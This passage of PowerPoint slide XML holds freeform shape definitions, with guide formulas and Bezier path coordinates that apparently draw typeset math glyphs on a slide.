                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="158"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="133" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="191"/>
                    <a:pt x="76" y="147"/>
                    <a:pt x="76" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="86"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="217"/>
                    <a:pt x="118" y="221"/>
                    <a:pt x="134" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="174"/>
                    <a:pt x="237" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="93" y="9"/>
                    <a:pt x="76" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="10"/>
                    <a:pt x="75" y="3"/>
                    <a:pt x="56" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="19" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="298"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="298"/>
                    <a:pt x="0" y="298"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="12" y="329"/>
                    <a:pt x="19" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="329"/>
                    <a:pt x="119" y="329"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="298"/>
                    <a:pt x="106" y="298"/>
                    <a:pt x="98" y="298"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="19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3" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EDD778-4D8A-4C21-A0A8-87BF91A7E63A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2451100" y="1196975"/>
              <a:ext cx="82550" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 91 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 91 h 279"/>
                <a:gd name="T4" fmla="*/ 199 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 63 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 19 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91 h 279"/>
                <a:gd name="T26" fmla="*/ 63 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>
                <a:gd name="T41" fmla="*/ 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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="91"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="91"/>
                    <a:pt x="199" y="91"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="63" y="10"/>
                    <a:pt x="63" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="91"/>
                    <a:pt x="12" y="91"/>
                    <a:pt x="19" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="261"/>
                    <a:pt x="97" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="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4" name="Freeform 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94242B30-1149-4F43-989E-2A7684C12942}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2562225" y="1184275"/>
              <a:ext cx="73025" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 116 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 116 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 116 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 116 w 188"/>
                <a:gd name="T39" fmla="*/ 2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6" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="95"/>
                    <a:pt x="113" y="90"/>
                    <a:pt x="96" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="25" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="176" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116"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5" name="Freeform 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFF3651-A819-4AB1-BEAB-6F6DFFE2C9AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2659062" y="1219200"/>
              <a:ext cx="79375" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="66" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="62"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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6" name="Freeform 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE987CE-916C-41EF-A3D7-301E96AEE1C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2751137" y="1219200"/>
              <a:ext cx="96838" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 56 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 249"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 172 w 249"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 132 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 229 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 76 w 249"/>
                <a:gd name="T55" fmla="*/ 27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9" h="218">
                  <a:moveTo>
                    <a:pt x="76" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="11"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="56" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="188"/>
                    <a:pt x="106" y="188"/>
                    <a:pt x="98" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="49"/>
                    <a:pt x="113" y="30"/>
                    <a:pt x="139" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="30"/>
                    <a:pt x="172" y="44"/>
                    <a:pt x="172" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="132" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="188"/>
                    <a:pt x="236" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="76" y="2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7" name="Freeform 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F657B2F-7AF6-44F4-B329-003ADD54CFB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2857500" y="1223963"/>
              <a:ext cx="85725" cy="42863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 224"/>
                <a:gd name="T1" fmla="*/ 35 h 111"/>
                <a:gd name="T2" fmla="*/ 224 w 224"/>
                <a:gd name="T3" fmla="*/ 17 h 111"/>
                <a:gd name="T4" fmla="*/ 198 w 224"/>
                <a:gd name="T5" fmla="*/ 0 h 111"/>
                <a:gd name="T6" fmla="*/ 26 w 224"/>
                <a:gd name="T7" fmla="*/ 0 h 111"/>
                <a:gd name="T8" fmla="*/ 0 w 224"/>
                <a:gd name="T9" fmla="*/ 17 h 111"/>
                <a:gd name="T10" fmla="*/ 23 w 224"/>
                <a:gd name="T11" fmla="*/ 35 h 111"/>
                <a:gd name="T12" fmla="*/ 201 w 224"/>
                <a:gd name="T13" fmla="*/ 35 h 111"/>
                <a:gd name="T14" fmla="*/ 198 w 224"/>
                <a:gd name="T15" fmla="*/ 111 h 111"/>
                <a:gd name="T16" fmla="*/ 224 w 224"/>
                <a:gd name="T17" fmla="*/ 93 h 111"/>
                <a:gd name="T18" fmla="*/ 201 w 224"/>
                <a:gd name="T19" fmla="*/ 76 h 111"/>
                <a:gd name="T20" fmla="*/ 23 w 224"/>
                <a:gd name="T21" fmla="*/ 76 h 111"/>
                <a:gd name="T22" fmla="*/ 0 w 224"/>
                <a:gd name="T23" fmla="*/ 93 h 111"/>
                <a:gd name="T24" fmla="*/ 26 w 224"/>
                <a:gd name="T25" fmla="*/ 111 h 111"/>
                <a:gd name="T26" fmla="*/ 198 w 224"/>
                <a:gd name="T2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4" h="111">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="224" y="35"/>
                    <a:pt x="224" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="23" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="111"/>
                    <a:pt x="224" y="111"/>
                    <a:pt x="224" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="19" y="111"/>
                    <a:pt x="26" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="11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8" name="Freeform 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD6A881-AF92-4F8D-99DA-AC440E03999F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId25"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2960687" y="1182688"/>
              <a:ext cx="80963" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 121 w 209"/>
                <a:gd name="T1" fmla="*/ 173 h 315"/>
                <a:gd name="T2" fmla="*/ 177 w 209"/>
                <a:gd name="T3" fmla="*/ 230 h 315"/>
                <a:gd name="T4" fmla="*/ 116 w 209"/>
